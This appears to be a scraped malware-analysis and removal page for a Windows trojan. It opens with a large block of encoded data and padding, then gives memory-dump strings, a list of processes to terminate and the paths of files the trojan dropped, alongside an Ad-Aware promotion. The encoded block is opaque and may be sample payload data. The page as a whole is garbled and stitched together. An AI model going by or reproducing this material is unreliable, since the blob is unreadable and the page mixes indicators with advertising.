lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD2
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_316_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mofcomp.exe:2760
    WindowsXP-KB968930-x86-ENG.exe:368
    ngen.exe:1788
    ngen.exe:1024
    ngen.exe:1236
    ngen.exe:3784
    ngen.exe:3820
    ngen.exe:2312
    ngen.exe:3872
    ngen.exe:3944
    ngen.exe:2268
    ngen.exe:3388
    ngen.exe:1152
    ngen.exe:4024
    ngen.exe:1584
    ngen.exe:1032
    ngen.exe:2256
    ngen.exe:3664
    ngen.exe:2116
    ngen.exe:2212
    %original file name%.exe:148
    %original file name%.exe:1736
    update.exe:576
    PSCustomSetupUtil.exe:3920
    PSCustomSetupUtil.exe:2868
    PSCustomSetupUtil.exe:2908
    PSCustomSetupUtil.exe:1784
    PSCustomSetupUtil.exe:2924
    PSCustomSetupUtil.exe:3320
    PSCustomSetupUtil.exe:3000
    PSCustomSetupUtil.exe:2424
    PSCustomSetupUtil.exe:3164
    PSCustomSetupUtil.exe:2304
    PSCustomSetupUtil.exe:2176
    PSCustomSetupUtil.exe:2684
    PSCustomSetupUtil.exe:500
    PSCustomSetupUtil.exe:2460
    PSCustomSetupUtil.exe:2624
    PSCustomSetupUtil.exe:2704
    PSCustomSetupUtil.exe:2284
    PSCustomSetupUtil.exe:2588
    PSCustomSetupUtil.exe:3464
    PSCustomSetupUtil.exe:224
    PSCustomSetupUtil.exe:1880
    PSCustomSetupUtil.exe:3392
    PSCustomSetupUtil.exe:780
    PSCustomSetupUtil.exe:2556
    PSCustomSetupUtil.exe:3784
    PSCustomSetupUtil.exe:2572
    mscorsvw.exe:3568
    wsmanhttpconfig.exe:1932
    wsmanhttpconfig.exe:2476

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\wbem\Logs\mofcomp.log (1817 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrshost.exe (22 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_wildcards.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_while.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_signing.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.resources.dll (3153 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\filesystem.format.ps1xml (133 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_aliases.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_quoting_rules.help.txt (659 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmanhttpconfig.exe (3009 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_command_precedence.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pssetupnativeutils.exe (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_type_operators.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_requirements.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe (7339 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_variables.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_faq.help.txt (775 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_do.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmprovhost.exe (657 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssessions.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssnapins.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_if.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_wmi_cmdlets.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_troubleshooting.help.txt (146 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.dll (14450 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershellcore.format.ps1xml (1492 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_output.help.txt (887 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_jobs.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrsmgr.dll (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll (5010 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_prompts.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\getevent.types.ps1xml (15 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.inf (2457 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrssrv.dll (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_eventlogs.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_preference_variables.help.txt (37 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_ise.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_ref.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll (38414 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spuninst.exe (3787 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmpty.xsl (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spupdsvc.exe (287 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spmsg.dll (495 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_return.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_line_editing.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_join.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_operators.help.txt (770 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.resources.dll (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowspowershellhelp.chm (26041 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_properties.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.exe (10748 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsman.format.ps1xml (837 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_debuggers.help.txt (21 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\types.ps1xml (2510 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pipelines.help.txt (411 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_transactions.help.txt (1011 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmwmipl.dll (2816 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.resources.dll (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_trap.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_profiles.help.txt (457 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.dll (1842 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshmsg.dll (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_providers.help.txt (59 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_throw.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshplugin.dll (802 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrscmd.dll (2907 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_locations.help.txt (794 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_methods.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_arrays.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.ver (14 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_language_keywords.help.txt (11 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe.mui (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_script_blocks.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_path_syntax.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_comment_based_help.help.txt (595 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_automatic_variables.help.txt (14 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pspluginwkr.dll (1756 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_assignment_operators.help.txt (379 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.exe (2526 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_reserved_words.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.dll (591 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wevtfwd.dll (3351 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.cmd (35 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\updspapi.dll (5940 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll-help.xml (16567 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.mof (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_methods.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.psd1 (950 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\dotnettypes.format.ps1xml (266 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_continue.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_modules.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_objects.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmsvc.dll (15909 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_jobs.help.txt (12 bytes)
